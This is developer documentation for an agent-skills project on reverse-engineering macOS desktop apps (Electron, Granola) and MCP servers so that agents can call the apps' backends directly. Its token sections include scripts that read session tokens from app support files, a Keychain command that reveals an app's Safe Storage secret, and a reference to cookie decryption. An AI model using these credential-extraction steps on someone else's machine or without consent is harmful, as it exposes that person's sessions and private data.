| Hybrid (web + desktop client) | Both — auth may live in desktop, API is same |
Desktop apps often reuse the same backend API as their web counterpart. The desktop client just embeds a token or session that the web version would get from a browser cookie flow. If you find the token, you can call the API directly from Python — no headless browser, no TLS fingerprint games.
Identify the App Stack
Is it Electron?
# Check for the telltale structure
ls -la /Applications/SomeApp.app/Contents/Resources/
# Look for: app.asar (bundled JS) or app/ (unpacked)
Electron apps ship:
- `app.asar` — compressed archive of the app’s JS/HTML
- `Resources/` — icons, native modules
- Chromium runtime inside `Frameworks/`
Find the app support directory
macOS apps store user data under:
~/Library/Application Support/<AppName>/
Common subdirs:
| Directory | What it contains |
|---|---|
| *.json (supabase, stored-accounts, local-state) | Auth tokens, config, feature flags |
| Cache/, Code Cache/ | Chromium cache (less useful) |
| Local Storage/, IndexedDB/ | WebStorage — sometimes has SQLite DBs |
| Session Storage/ | Ephemeral state |
| blob_storage/ | Binary blobs |
| *.json (cache-v6, state) | Entity cache — synced from backend, often the gold |
Auth: Steal the Token
Desktop apps must persist auth somewhere. The user is logged in; the app survives restarts. Find where.
Common patterns
| File pattern | Typical content |
|---|---|
| supabase.json, auth.json, tokens.json | JWT access_token, refresh_token |
| stored-accounts.json | Account list, sometimes with session data |
| Cookies (SQLite) | HTTP-only cookies — harder to extract |
| Keychain | macOS Keychain — use security find-generic-password |
Extraction pattern
from pathlib import Path
import json
APP_SUPPORT = Path.home() / "Library" / "Application Support" / "Granola"
def get_token() -> str:
    with open(APP_SUPPORT / "supabase.json") as f:
        data = json.load(f)
    tokens = json.loads(data["workos_tokens"])  # nested JSON string
    return tokens["access_token"]
Tokens often live in nested JSON strings — the outer file is JSON, but
some values (like workos_tokens) are themselves JSON strings. Parse twice.
Token lifetime
Desktop app tokens are often refreshed by the app when it’s running. If your
skill gets 401, the user needs to open the app to refresh. Document this.
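One way to surface that cleanly is to preflight the token: decode the JWT’s exp claim locally (no signature check needed for this) and tell the user to reopen the app instead of failing with a raw 401. The 60-second skew is an assumption:

```python
import base64
import json
import time

def jwt_expired(token: str, skew: int = 60) -> bool:
    """True if the JWT's exp claim is past (or within `skew` seconds of) now."""
    payload_b64 = token.split(".")[1]
    payload_b64 += "=" * (-len(payload_b64) % 4)  # restore stripped padding
    payload = json.loads(base64.urlsafe_b64decode(payload_b64))
    exp = payload.get("exp")
    return exp is not None and exp < time.time() + skew
```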
Discovery: App Bundle → API Endpoints
The app’s bundled JS contains every API endpoint it calls.
1. Find the app bundle
# macOS: find by name
mdfind "kMDItemDisplayName == 'Granola*'"
# Or known paths
ls /Applications/Granola.app/Contents/Resources/app.asar
2. Extract strings from the bundle
# If app.asar exists, unpack or search it
npx asar extract /Applications/Granola.app/Contents/Resources/app.asar /tmp/granola-app
# Or just run strings on the binary
strings /Applications/Granola.app/Contents/MacOS/Granola | grep -E "https://|api\.|/v1/|/v2/"
3. Search for endpoint patterns
| Pattern | What you’ll find |
|---|---|
| https://api. | Base API URLs |
| https://notes. | Web app / docs URLs (often same backend, different frontend) |
| /v1/, /v2/ | Versioned API paths |
| get-documents, get-entity-set | Endpoint names — these are your operations |
4. Infer request shape from usage
Once you have endpoint names, search the bundle for where they’re called:
grep -r "get-entity-set\|get-entity-batch" /tmp/granola-app/
The surrounding code often shows the request body shape: { entity_type: "chat_thread" }.
Discovery: Local Cache → Data Model
The app syncs entities from the backend into a local cache. That cache is your schema discovery.
Find the cache file
Look for large JSON files or SQLite DBs in Application Support:
ls -la ~/Library/Application\ Support/Granola/
# cache-v6.json <- 800KB, entities inside
# local-state.json <- feature flags, config
Parse the structure
import json
from pathlib import Path
cache_path = Path.home() / "Library/Application Support/Granola/cache-v6.json"
data = json.loads(cache_path.read_text())
state = data.get("cache", {}).get("state", {})
entities = state.get("entities", {})
# What entity types exist?
print(list(entities.keys()))  # ['chat_thread', 'chat_message']
Infer relationships
From the cache structure:
| Observation | Implication |
|---|---|
| chat_thread.data.grouping_key == "meeting:{doc_id}" | Thread is linked to document |
| chat_message.data.thread_id == thread.id | Message belongs to thread |
| entity.type == "chat_thread" | API has entity_type parameter |
The cache gives you:
- Entity types — what to ask the API for
- Relationships — how to filter and join
- Field names — request/response shape
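A sketch that turns a cache dump into that summary; the `cache.state.entities` nesting follows the Granola example above, and other apps will differ:

```python
def summarize_entities(cache: dict) -> dict:
    """Map each entity type to the sorted set of field names seen on it."""
    entities = cache.get("cache", {}).get("state", {}).get("entities", {})
    summary = {}
    for etype, by_id in entities.items():
        fields = set()
        for entity in by_id.values():  # entities are keyed by id
            fields.update(entity.keys())
        summary[etype] = sorted(fields)
    return summary

sample = {"cache": {"state": {"entities": {
    "chat_thread": {"t1": {"id": "t1", "data": {"grouping_key": "meeting:d1"}}},
}}}}
```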
API Probing: Confirm and Call
You have a token and a list of endpoints. Now validate.
1. Reuse existing transport
If the API is behind a plain origin (no CloudFront WAF), urllib often works:
from urllib.request import Request, urlopen
import json, gzip
def api_post(token: str, endpoint: str, body: dict):
    req = Request(
        f"https://api.granola.ai{endpoint}",
        data=json.dumps(body).encode(),
        headers={
            "Authorization": f"Bearer {token}",
            "Content-Type": "application/json",
            "Accept-Encoding": "gzip",
        },
        method="POST",
    )
    with urlopen(req, timeout=30) as r:
        raw = r.read()
        if r.headers.get("Content-Encoding") == "gzip":
            raw = gzip.decompress(raw)
        return json.loads(raw)
If you get 403, try httpx with HTTP/2 (see 1-transport).
2. Probe each endpoint
Start with the simplest call:
# List entities — what does the API return?
resp = api_post(token, "/v1/get-entity-set", {"entity_type": "chat_thread"})
# -> {"data": [{"id": "...", "workspace_id": "...", "created_at": "..."}], "entity_type": "chat_thread"}
3. Batch fetch for full data
The “set” endpoint usually returns IDs + minimal metadata. The “batch” endpoint returns full entities:
resp = api_post(token, "/v1/get-entity-batch", {
    "entity_type": "chat_thread",
    "entity_ids": ["uuid-1", "uuid-2"],
})
# -> {"data": [{"id": "...", "data": {"grouping_key": "meeting:doc-id", ...}}, ...]}
The data field on each entity is where the app-specific payload lives.
End-to-End Flow: Granola Example
- Auth — `~/Library/Application Support/Granola/supabase.json` → `workos_tokens.access_token`
- Documents — `POST /v2/get-documents` (existing), `POST /v1/get-documents-batch`
- Transcript — `POST /v1/get-document-transcript`
- Panels — `POST /v1/get-document-panels` (AI summaries)
- Chat threads — `POST /v1/get-entity-set` + `get-entity-batch` with `entity_type: "chat_thread"`
- Chat messages — same with `entity_type: "chat_message"`
- Link — `chat_thread.data.grouping_key == "meeting:{document_id}"` ties a thread to a meeting
Web URLs (from meeting summaries): https://notes.granola.ai/t/{thread_id} — same IDs as API.
API + Cache: Two Connections for Desktop Apps
Desktop apps that sync with a backend often have two data sources:
| Source | Where | When to use |
|---|---|---|
| API | Network call with token | Fresh data, full transcripts, works when online |
| Cache | Local file (JSON, SQLite) the app writes | Instant, offline, token expired, or fallback |
The app syncs entities into a local cache; that cache is often readable without the token. You can offer both as connections and let the caller choose.
Connection model
connections:
  api:
    description: "Live API — token from app, freshest data"
  cache:
    description: "Local cache — instant, works offline (reads app's cache file)"
Operations declare connection: api or connection: cache. Some operations may
support both; others (e.g. get_meeting with full transcript) may be API-only if
the cache doesn’t store transcripts.
When cache is enough
| Operation | API | Cache |
|---|---|---|
| list_meetings | Yes — paginated from server | Yes — state.documents (may be stale) |
| list_conversations | Yes | Yes — entities.chat_thread filtered by grouping_key |
| get_conversation | Yes | Yes — entities.chat_message by thread_id |
| get_meeting | Yes — full transcript + panels | Partial — cache may have docs but not transcript text |
Implementation pattern
CACHE_PATH = Path.home() / "Library" / "Application Support" / "Granola" / "cache-v6.json"
def load_cache() -> dict:
    with open(CACHE_PATH) as f:
        return json.load(f)

def cmd_list_conversations_from_cache(document_id: str) -> list:
    data = load_cache()
    threads = (data.get("cache", {}).get("state", {}).get("entities", {}) or {}).get("chat_thread", {})
    target_key = f"meeting:{document_id}"
    out = []
    for tid, t in threads.items():
        if (t.get("data") or {}).get("grouping_key") != target_key:
            continue
        out.append({...})
    return out
Source param: api | cache | auto
For operations that support both, add a source param:
- `api` — live call only (default)
- `cache` — local file only
- `auto` — try API, fall back to cache on 401/network error
This gives offline resilience without requiring the user to pick a connection up front.
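A sketch of that dispatch; `api_call` and `cache_call` are hypothetical stand-ins for the skill’s real operations, and a real skill would catch 401/network errors specifically rather than bare Exception:

```python
def fetch(source: str, api_call, cache_call):
    """Dispatch on source: api | cache | auto (API first, cache on failure)."""
    if source == "api":
        return api_call()
    if source == "cache":
        return cache_call()
    # auto: freshest data when possible, local cache as the fallback
    try:
        return api_call()
    except Exception:  # narrow this to auth/network errors in a real skill
        return cache_call()
```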
Pure-cache skills (WhatsApp, Copilot Money)
Some desktop apps have no documented API — the app syncs internally and we only read the local DB. Those are “cache-only” by necessity:
| Skill | Data source | Pattern |
|---|---|---|
| WhatsApp | ChatStorage.sqlite | Cache-only |
| Copilot Money | CopilotDB.sqlite | Cache-only |
| Granola | api.granola.ai + cache-v6.json | API + cache |
Subagent Strategy for Exploration
When the codebase is large or you need to search broadly:
- Launch an explore subagent with the app path, cache path, and bundle path.
- Tasks: Extract API URLs from app.asar, parse cache JSON structure, identify entity types and relationships.
- Deliverable: Findings report with endpoints, auth location, data model.
Then implement the skill using those findings. The subagent does the tedious search-and-document step; you do the clean integration.
Checklist: New Desktop App Skill
| Step | Action |
|---|---|
| 1 | Find the app: mdfind or ls /Applications/ |
| 2 | Check for Electron: app.asar in Resources |
| 3 | Locate Application Support: ~/Library/Application Support/<AppName>/ |
| 4 | Find auth: grep for token, access_token, Bearer in JSON files |
| 5 | Find cache: large JSON or SQLite with entities, state, cache |
| 6 | Parse cache: entity types, relationships, field names |
| 7 | Extract endpoints: strings on binary or unpack asar, grep for https://, /v1/ |
| 8 | Probe API: get-entity-set, get-entity-batch or equivalent with token |
| 9 | Implement: same patterns as web skills — operations, adapters, error handling |
Real-World Examples
| Skill | Discovery path | API + cache |
|---|---|---|
| skills/granola/ | supabase.json token, cache-v6.json entities, app.asar → get-entity-set/batch, grouping_key for meeting→thread link | Yes — api/cache/auto via source param |
| skills/whatsapp/ | ChatStorage.sqlite | Cache-only (no API) |
| skills/copilot-money/ | CopilotDB.sqlite | Cache-only (no API) |
Electron App Deep Dive
Electron apps are Chromium + Node.js packaged into a desktop shell. The JS bundle is readable, the storage is standard Chromium formats, and the auth tokens are often sitting in a JSON file. Once you know where to look, Electron is one of the easiest desktop targets.
Part of Layer 6: Desktop Apps. See also 3-auth for general auth patterns.
Identify Electron
ls /Applications/SomeApp.app/Contents/Resources/
# Look for: app.asar ← bundled JS/HTML/CSS
# app/ ← unpacked (less common)
file /Applications/SomeApp.app/Contents/MacOS/SomeApp
# Should reference Electron framework
Extract and Read the Bundle
# One-shot: extract app.asar to /tmp/app
npx @electron/asar extract /Applications/SomeApp.app/Contents/Resources/app.asar /tmp/app
ls /tmp/app
# Typical: dist-electron/ dist-app/ node_modules/ package.json
The bundle is minified but readable. Variable names are mangled; string literals (URLs, endpoint paths, header names) are not minified. Use these to navigate.
Find all API endpoints
grep -o "[a-zA-Z]*\.example\.com[^\"']*" /tmp/app/dist-electron/main/index.js | sort -u
Find all subdomains
grep -o "[a-z-]*\.example\.com" /tmp/app/dist-electron/main/index.js | sort -u
Find auth header construction
# Look for Authorization, X-Client-*, bearer
grep -o ".{0,150}Authorization.{0,150}" /tmp/app/dist-electron/main/index.js | head -10
Storage Locations
All Electron app data lives in:
~/Library/Application Support/<AppName>/
| File / Dir | What it contains |
|---|---|
| *.json files | Auth tokens, config, feature flags |
| Cookies | SQLite — Chromium encrypted cookies (usually empty in Electron) |
| Local Storage/leveldb/ | LevelDB — localStorage, sometimes tokens |
| IndexedDB/file__0.indexeddb.leveldb/ | IndexedDB — app state, can contain tokens |
| Preferences | JSON — per-profile settings |
Electron apps typically store auth in JSON files, not browser cookies, because the main process (Node.js) writes them directly without going through Chromium’s cookie jar.
Find the Token
1. Scan JSON files for tokens
for f in ~/Library/Application\ Support/AppName/*.json; do
  echo "=== $f ===" && python3 -c "
import json
with open('$f') as fh:
    d = json.load(fh)
def walk(obj, p=''):
    if isinstance(obj, dict):
        for k, v in obj.items():
            walk(v, p + '.' + k)
    elif isinstance(obj, str) and len(obj) > 20:
        print(f'  {p}: {obj[:60]}')
walk(d)
"
done
2. Look for JWT patterns
# JWTs start with eyJ (base64url of {"alg":...)
grep -r "eyJ" ~/Library/Application\ Support/AppName/ --include="*.json" -l
3. Decode any JWT you find
import base64, json

def decode_jwt(token):
    parts = token.split('.')
    def b64d(s):
        s += '=' * (-len(s) % 4)  # restore padding only when needed
        return json.loads(base64.urlsafe_b64decode(s))
    return b64d(parts[0]), b64d(parts[1])  # header, payload

header, payload = decode_jwt(token)
print("iss:", payload.get("iss"))  # who issued it
print("exp:", payload.get("exp"))  # expiry
print("claims:", list(payload.keys()))
The iss field tells you the auth provider (WorkOS, Supabase, Auth0, Okta,
etc.) and which client ID / tenant.
Required Headers
Most Electron APIs reject requests missing client identification headers. Find them by searching the bundle for the header-building function:
# Common patterns: X-Client-*, X-App-*, platform, device-id
grep -o ".{0,100}X-Client.{0,200}" /tmp/app/dist-app/assets/operationBuilder.js | head -5
Typical Electron API headers:
| Header | Example | Notes |
|---|---|---|
| X-Client-Version | 7.71.1 | App version from package.json |
| X-Client-Platform / X-Granola-Platform | darwin | OS platform |
| X-Workspace-Id | UUID | Multi-tenant identifier |
| X-Device-Id | UUID | Persisted device fingerprint |
Without these, the server may return {"message":"Unsupported client"} even
with a valid token.
Get the version:
cat /tmp/app/package.json | python3 -c "import json,sys; d=json.load(sys.stdin); print(d['version'])"
Auth Migration Pattern (Supabase → WorkOS)
Many Electron apps launched with Supabase Auth and later migrated to WorkOS (or Clerk, Auth0, etc.) for enterprise SSO. The telltale sign:
~/Library/Application Support/AppName/supabase.json ← filename from v1
→ contents: { "workos_tokens": "...", "user_info": ... } ← migration artifact
The filename is kept for backward compatibility, but the contents changed.
The old Supabase user UUID is preserved as external_id in the new JWT so
database foreign keys don’t break.
How to detect a migration:
import json

with open("supabase.json") as f:
    d = json.load(f)

if "workos_tokens" in d:
    print("Migrated to WorkOS — parse workos_tokens as JSON for the JWT")
elif "access_token" in d:
    print("Still on Supabase — access_token is the JWT directly")
elif "session" in d:
    print("Supabase session object — check session.access_token")
See workos.md for the full WorkOS token model.
CrossAppAuth — Desktop ↔ Web Session Handoff
Some Electron apps share a session between the desktop client and the web app without requiring a separate login. The pattern:
- User logs in on the web app (browser)
- Desktop app detects the session (via deep link, polling, or IPC)
- Desktop calls an
auth-handoff-complete-style endpoint with the web session - Server mints a new desktop token (different expiry, different claims)
You’ll see this as sign_in_method: "CrossAppAuth" in the JWT payload, or
as an endpoint like /v1/auth-handoff-complete in the app bundle.
To find:
grep -o "[^\"]*auth.handoff[^\"]*\|[^\"]*cross.app[^\"]*" /tmp/app/dist-electron/main/index.js
Feature Flags
Electron apps frequently gate features behind server-controlled flags stored
in local-state.json or a similar config file:
import json

with open("local-state.json") as f:
    d = json.load(f)

flags = d.get("featureFlags", {})
for k, v in flags.items():
    print(f"  {k}: {v}")
If an API endpoint returns 403 Forbidden or {"enabled": false} even with
a valid token, check whether there’s a feature flag that needs to be true.
Some flags are user-controlled (toggle in Settings), others are server-pushed
and require a plan upgrade.
Chromium Storage (usually empty)
Electron apps can use Chromium cookies and localStorage, but most don’t — the Node.js main process writes tokens directly to JSON files instead.
If you do find a populated Cookies database, decrypt it the same way as
Brave or Chrome:
# Check if there's a Keychain entry
security find-generic-password -s "AppName Safe Storage" -a "AppName" -w
# Cookies database
sqlite3 ~/Library/Application\ Support/AppName/Cookies \
"SELECT name, host_key FROM cookies LIMIT 20;"
See the skills/brave-browser/ skill for the full
Chromium cookie decryption pipeline (PBKDF2 + AES-128-CBC).
Checklist
□ Find app.asar and extract it
□ Grep for all subdomains and API endpoints
□ Find the header-building function → identify required custom headers
□ Scan ~/Library/Application Support/<App>/*.json for tokens
□ Decode any JWT → check iss, exp, claims
□ Detect auth migration (supabase.json but workos_tokens key?)
□ Test token against a known-working endpoint with correct headers
□ Check for feature flags gating the feature you need
Reverse Engineering — MCP Servers
How to discover, evaluate, and map Model Context Protocol (MCP) servers for skills that need to connect as MCP clients. Unlike web reverse-engineering, MCPs are self-describing — tools/list hands you the full tool catalog. What you’re reverse-engineering is auth, actual response shapes, coverage gaps, and behavioral quirks.
This is Layer 7 of the reverse-engineering docs:
- Layer 1: Transport — 1-transport
- Layer 2: Discovery — 2-discovery
- Layer 3: Auth & Runtime — 3-auth
- Layer 4: Content — 4-content
- Layer 5: Social Networks — 5-social
- Layer 6: Desktop Apps — 6-desktop-apps
- Layer 7: MCP Servers (this file) — discovering and evaluating MCPs for skill integration
Tool: The MCP test harness in agentos/scripts/mcp-test.mjs is the primary probe. Use it to discover tools, test calls, and inspect responses. Smithery registry (mcp-test.mjs smithery search) finds third-party MCPs.
Transport — use httpx, not urllib
HTTP MCPs (Granola, Linear, etc.) often sit behind CloudFront or Cloudflare. Python urllib and requests advertise http/1.1 and get flagged by JA4 fingerprinting. Follow 1-transport: use httpx with http2=True for Python probes. Node fetch is fine (negotiates HTTP/2). Skill-local probe scripts (e.g. skills/granola/mcp-probe.py) should use httpx.
Layer 0: Existence — Does the service have an MCP?
Before anything else, determine if an MCP exists for the service. Three discovery paths:
Convention probing
Most services follow predictable URL patterns. Probe these for every skill you have:
| Pattern | Example |
|---|---|
| https://mcp.{domain}/mcp | Granola: mcp.granola.ai/mcp, Linear: mcp.linear.app/mcp |
| https://{domain}/mcp | https://example.com/mcp |
| https://api.{domain}/mcp | https://api.example.com/mcp |
Probe: Send a bare POST with an initialize JSON-RPC request. A 404 or connection refused means nothing there. A JSON-RPC response or auth challenge means you found one.
# Using mcp-test.mjs with a raw URL (no auth)
node scripts/mcp-test.mjs http https://mcp.granola.ai/mcp
Smithery registry
The Smithery registry indexes MCPs published by third parties. Use this for services that might have community MCPs but no official one:
node scripts/mcp-test.mjs smithery search "granola"
node scripts/mcp-test.mjs smithery search "linear"
Web search
Many services now announce MCP support publicly. Search for "{service name}" MCP or "{service name}" Model Context Protocol in changelogs, blog posts, or docs.
Output: Existence table
| Skill | MCP URL | Transport | Status |
|---|---|---|---|
| granola | mcp.granola.ai/mcp | HTTP | found |
| linear | mcp.linear.app/mcp | HTTP | found |
| todoist | npx @abhiz123/todoist-mcp-server | stdio | found (3rd party) |
| goodreads | — | — | none found |
Layer 1: Transport — How does the session work?
MCPs run over two transports. The harness handles both; you need to log what you observe.
Streamable HTTP
- POST JSON-RPC to the URL
- Response may be plain JSON or SSE (`event: message\ndata: {...}`)
- `mcp-session-id` in response headers — session-stateful vs stateless
- Used by: Granola, Linear, other hosted MCPs
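A small helper for unwrapping either framing (a sketch; it assumes a single event per response, while real SSE streams can carry several):

```python
import json

def unwrap_response(body: str) -> dict:
    """Extract the JSON-RPC payload from an MCP HTTP response body.
    Handles SSE framing (`event: message` / `data: {...}`) and plain JSON."""
    for line in body.splitlines():
        if line.startswith("data:"):
            return json.loads(line[len("data:"):].strip())
    # No SSE framing -- the body is the JSON-RPC message itself
    return json.loads(body)
```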
Stdio
- Spawn subprocess: `npx -y @package/mcp-server`
- JSON-RPC over stdin/stdout, newline-delimited
- Used by: Todoist, Notion, Slack (npm packages)
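The stdio exchange can be sketched as a one-shot helper (a real client keeps the process alive and runs `initialize` before any other call; `@package/mcp-server` above is a placeholder):

```python
import json
import subprocess

def stdio_request(argv: list[str], method: str, params: dict, req_id: int = 1) -> dict:
    """Send one newline-delimited JSON-RPC request to a stdio MCP server
    and parse the first line of its reply."""
    proc = subprocess.Popen(
        argv, stdin=subprocess.PIPE, stdout=subprocess.PIPE, text=True
    )
    msg = {"jsonrpc": "2.0", "id": req_id, "method": method, "params": params}
    out, _ = proc.communicate(json.dumps(msg) + "\n", timeout=60)
    return json.loads(out.splitlines()[0])
```

Usage against a real server would look like `stdio_request(["npx", "-y", "@package/mcp-server"], "initialize", {...})`.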
What to log
| Field | How to check |
|---|---|
| `mcp-session-id` | Response headers on first request |
| Response format | SSE vs plain JSON body |
| `protocolVersion` | From the `initialize` response `result` (alongside `serverInfo`) |
| `capabilities` | Tools, resources, prompts, logging |
| Server-initiated requests | Any during handshake? |
Layer 2: Auth — What does it need and how do you get in?
MCP auth discovery is a waterfall. The protocol is designed for this.
Step 1: Naked probe
Send initialize with no auth headers.
| Outcome | Meaning |
|---|---|
| Success | Public MCP, no auth (rare for user data) |
| 401 with `WWW-Authenticate` | Auth required; header describes scheme |
| Connection accepted, `tools/call` fails | Auth is per-call, not per-session |
Step 2: OAuth discovery
Two discovery paths. The 401 response may include resource_metadata pointing at one of these:
Protected resource discovery (RFC 9728):
GET {origin}/.well-known/oauth-protected-resource
Returns authorization_servers, resource, bearer_methods_supported. Example: Granola’s 401 pointed to this; response: {"authorization_servers":["https://mcp-auth.granola.ai"], ...}.
OAuth authorization server discovery (RFC 8414):
GET {origin}/.well-known/oauth-authorization-server
Returns authorization_endpoint, token_endpoint, scopes_supported for the full OAuth flow.
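Both discovery URLs derive mechanically from the MCP URL's origin; this helper (ours, not part of any harness) builds them:

```python
from urllib.parse import urlsplit

def discovery_urls(mcp_url: str) -> dict[str, str]:
    """Well-known OAuth metadata URLs to try after a 401
    (protected resource metadata, then authorization server metadata)."""
    parts = urlsplit(mcp_url)
    origin = f"{parts.scheme}://{parts.netloc}"
    return {
        "protected_resource": f"{origin}/.well-known/oauth-protected-resource",
        "authorization_server": f"{origin}/.well-known/oauth-authorization-server",
    }
```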
Step 3: Token reuse hypothesis
For services where you already have a skill: can you reuse the existing token? Granola’s supabase token, Linear’s API key — do they work as Authorization: Bearer {token} against the MCP endpoint? This is a single-line test.
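That test, sketched in Python (assumes `httpx` with HTTP/2; the env var mirrors the harness's `MCP_BEARER_TOKEN`; on a session-stateful server the call may still need `initialize` first, but the status code answers the auth question either way):

```python
import os

def bearer_headers(token: str) -> dict[str, str]:
    """Headers for the token-reuse probe. MCP servers may reply with SSE,
    hence the dual Accept value."""
    return {
        "Authorization": f"Bearer {token}",
        "Accept": "application/json, text/event-stream",
    }

if __name__ == "__main__":
    import httpx  # pip install 'httpx[http2]'
    token = os.environ["MCP_BEARER_TOKEN"]  # the existing skill's token
    with httpx.Client(http2=True) as client:
        resp = client.post(
            "https://mcp.granola.ai/mcp",
            json={"jsonrpc": "2.0", "id": 1, "method": "tools/list"},
            headers=bearer_headers(token),
        )
    # 401 -> token not reusable (Granola's case); 2xx -> hypothesis confirmed
    print(resp.status_code)
```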
Step 4: Scope mapping
Once authenticated: does the MCP give full access or a restricted view? Some MCPs expose read-only tools even if the underlying API supports writes.
Layer 3: Tool catalog — What’s exposed?
This is where MCPs are radically easier than web reverse-engineering. tools/list returns the full catalog:
{
"tools": [{
"name": "list_meetings",
"description": "List recent meetings",
"inputSchema": { "type": "object", "properties": { "limit": { "type": "integer" } } }
}]
}
Cross-reference with existing skill
For each MCP tool, find the corresponding operation in your existing skill. Build a coverage matrix:
| Your Operation | MCP Tool | Match? | Notes |
|---|---|---|---|
| `list_meetings` | `list_meetings` | exact | Same params? |
| `get_meeting` | `get_document` | name differs | Check if transcript included |
| `list_conversations` | — | no match | MCP doesn’t expose Q&A |
| — | `create_note` | no match | MCP has write we don’t |
This matrix is the key deliverable — it tells you whether the MCP is superset, subset, or lateral complement.
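A quick way to compute the matrix skeleton from the two name sets (the helper is ours; renamed tools like `get_document` still need manual pairing):

```python
def coverage_matrix(skill_ops: set[str], mcp_tools: set[str]) -> dict[str, list[str]]:
    """Bucket names by overlap. Exact matches only -- near-matches must
    be paired by hand before reading the verdict."""
    return {
        "exact": sorted(skill_ops & mcp_tools),
        "skill_only": sorted(skill_ops - mcp_tools),  # MCP coverage gaps
        "mcp_only": sorted(mcp_tools - skill_ops),    # additive, often writes
    }
```

With the example sets above, `create_note` lands in `mcp_only` and `list_conversations` in `skill_only`, matching the table.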
Annotation analysis
Check tool.annotations:
- `readOnlyHint` — safe to probe, no mutation
- `destructiveHint` — mutates state, be careful in testing
Layer 4: Response analysis — What does the data look like?
MCP input schemas are declared; output is usually opaque `content: [{type: "text", text: "..."}]`. You must call each tool and inspect.
For each read-safe tool
- Call with minimal params
- Unwrap `content[0].text` and parse as JSON
- Document the actual response shape — field names, nesting, types
- Compare field-by-field to your existing skill’s normalized output
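The unwrap step can be sketched as follows (assumes the common single-text-item shape; tools that return pre-formatted prose instead of JSON fall through to the raw string):

```python
import json

def tool_result_data(result: dict):
    """Pull the payload out of an MCP tool result. Most servers return
    content: [{"type": "text", "text": "..."}] where text is itself JSON."""
    for item in result.get("content", []):
        if item.get("type") == "text":
            try:
                return json.loads(item["text"])
            except json.JSONDecodeError:
                return item["text"]  # pre-formatted prose, not JSON
    return result  # unexpected shape -- inspect manually
```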
This answers: Is the MCP richer, thinner, or different? Does Granola’s MCP return raw utterances like the internal API, or only a pre-formatted summary?
Layer 5: Gap analysis — Is it worth connecting?
For each service, combine layers 0–4 into a verdict:
| Signal | Implication |
|---|---|
| MCP covers all your operations with equal or richer data | MCP as primary, existing skill as fallback |
| MCP covers some, misses others | Multi-connection: MCP for what it covers, API for the rest |
| MCP is thinner than your skill | Keep existing skill; MCP not worth it |
| MCP exposes tools you don’t have (especially writes) | MCP as additive connection |
| Auth is significantly easier via MCP | MCP worth it for auth stability alone |
Running the analysis
For each service, work through layers 0–4 using mcp-test.mjs:
# Generic harness (agentos repo) — pass URL; MCP_BEARER_TOKEN for auth
node scripts/mcp-test.mjs http https://mcp.granola.ai/mcp
node scripts/mcp-test.mjs http https://mcp.granola.ai/mcp call list_meetings '{"limit": 3}'
# Skill-local exploration (agentos-community) — reads token from Granola app
python3 skills/granola/mcp-probe.py
python3 skills/granola/mcp-probe.py tools
Start with services where you already have skills (Granola, Linear). You have ground truth — your existing skill tells you exactly what data to expect. The output is a completed coverage matrix and a clear verdict.
Real-World Examples
| Skill | MCP URL | Transport | Auth | Coverage |
|---|---|---|---|---|
| granola | mcp.granola.ai/mcp | HTTP | Different auth — supabase token invalid. 401 returns WWW-Authenticate: Bearer error="invalid_token", resource_metadata="https://mcp.granola.ai/.well-known/oauth-protected-resource". MCP uses OAuth; internal API token does not work. Probe with httpx succeeds (no TLS block). | |
| linear | mcp.linear.app/mcp | HTTP | OAuth / API key | TBD — run analysis |
Fill this table as you run the analysis. See skills/granola/ for the existing Python skill’s operations and adapter schema.
Probe commands
Use the generic harness (no service-specific code) or skill-local scripts:
# Generic MCP harness (agentos repo) — pass URL; set MCP_BEARER_TOKEN for auth
node scripts/mcp-test.mjs http https://mcp.granola.ai/mcp
MCP_BEARER_TOKEN=$(python3 -c "
import json
from pathlib import Path
p = Path.home() / 'Library/Application Support/Granola/supabase.json'
t = json.loads(json.load(p.open())['workos_tokens'])
print(t['access_token'])
") node scripts/mcp-test.mjs http https://mcp.granola.ai/mcp
# Skill-local exploration (agentos-community)
python3 skills/granola/mcp-probe.py
Helper Files & Patterns
Helper files
Keep skill YAML readable. When executor logic starts looking like real code, extract it into a helper file in the skill folder and have the operation call that file.
Keep in readme.md (markdown only — narrative, setup, examples):
- when to use the skill, limitations, and agent-facing notes
- short examples and troubleshooting
Keep in skill.yaml:
- `id`, `name`, `connections`, `adapters`, `operations`, executors, and all machine-readable wiring
Move into helper files:
- long AppleScript, Swift, Python, or shell logic
- anything with loops, branching, string escaping, or manual JSON construction
- anything large enough that syntax highlighting, direct local execution, or isolated debugging would help
Preferred patterns:
- use Swift helper files for Apple framework integrations like Contacts, EventKit, or other native macOS APIs
- use Python helper files for parsing, normalization, and API glue — prefer the `python:` executor over `command:` + `binary: python3`
- use bash only for thin wrappers or simple pipelines
- keep AppleScript inline only when it is truly short; otherwise prefer a helper file
Leading examples
| Skill | Pattern | File |
|---|---|---|
| `gmail` | `_call` dispatch: list stubs then hydrate | `gmail.py` |
| `goodreads` | GraphQL discovery, Apollo cache extraction, multi-tier runtime config | `public_graph.py` |
| `claude` | API replay with session cookies and stealth headers | `claude-api.py` |
| `austin-boulder-project` | Bundle config extraction and tenant-namespace auth | `abp.py` |
| `exa` | Dashboard auth flows, `__secrets__` import, Playwright→HTTPX pattern | (in progress) |
| `reddit` | Shell helper for comment posting | `comments_post.sh` |
| `apple-contacts` | Swift helpers for native macOS APIs | `accounts.swift`, `get_person.swift` |
Advanced patterns
This book does not try to document every executor or every edge case. If you need something advanced, copy an existing skill:
- `linear` for GraphQL with connections
- `youtube` for command execution
- `gmail` + `mimestream` for provider-sourced OAuth and `_call` dispatch
- `claude` + `brave-browser` for consumer/provider cookie patterns
- `goodreads` for multi-connection (graphql + web) and sandbox storage
- `granola` for multi-connection (API + cache) with Python connection dispatch
- `exa` (in progress) for dashboard auth flows, `__secrets__` secret import, and the Playwright→HTTPX discovery pattern
- an existing cookie-provider skill for keychain, crypto, and multi-step extraction
For skills that reverse-engineer web services without public APIs, see the Reverse Engineering section.
Skill Catalog
All skills in this repo. Each skill folder contains skill.yaml (the manifest) and readme.md (agent-facing docs).
Web & Search
| Skill | Entities | What it does |
|---|---|---|
| `exa` | webpage | Semantic web search and content extraction |
| `brave` | webpage | Web search via Brave Search API |
| `firecrawl` | webpage | Browser-rendered page scraping |
| `curl` | webpage | Simple URL fetching (no API key needed) |
| `serpapi` | — | Flight search via SerpAPI |
| `research-web` | document | Multi-source web research |
Productivity
| Skill | Entities | What it does |
|---|---|---|
| `todoist` | task, project, tag | Task management with priorities and projects |
| `linear` | task, project | Engineering project management |
| `gmail` | — | Gmail via OAuth (read, search, send) |
| `apple-calendar` | meeting, calendar | macOS Calendar events |
| `apple-contacts` | person | macOS Contacts |
Social & Communication
| Skill | Entities | What it does |
|---|---|---|
| `imessage` | message, conversation, person | iMessage history |
